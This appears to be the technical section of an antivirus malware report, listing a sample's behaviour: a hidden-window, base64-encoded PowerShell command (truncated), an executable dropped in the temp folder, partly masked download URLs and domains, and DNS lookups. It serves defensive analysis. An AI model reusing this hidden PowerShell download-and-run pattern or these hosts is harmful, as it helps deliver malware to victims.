Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABTAGMAcgBgAGkAcABUAH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAC0AbwBiAGoAZQBjAHQAJwAsACcAZQB3ACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADEAfQB7ADIAfQB7AD...
- %TEMP%\54078.exe
- %TEMP%\54078.exe
- 'pl###tudio.pl':80
- 'ho##ixel.pl':80
- 'pr##cip.es':80
- 'pr##cip.es':443
- 'in###sa.com.mx':80
- http://pl###tudio.pl/TKTGbr/
- http://ho##ixel.pl/dbvoptima/DcsXrncT/
- http://pr##cip.es/uyMkVd/
- http://in###sa.com.mx/YOvk
- 'pr##cip.es':443
- DNS ASK pl###tudio.pl
- DNS ASK th##axx.net
- DNS ASK ho##ixel.pl
- DNS ASK pr##cip.es
- DNS ASK in###sa.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABTAGMAcgBgAGkAcABUAH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAC0AbwBiAGoAZQBjAHQAJwAsACcAZQB3ACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADEAfQB7ADIAfQB7AD...' (со скрытым окном)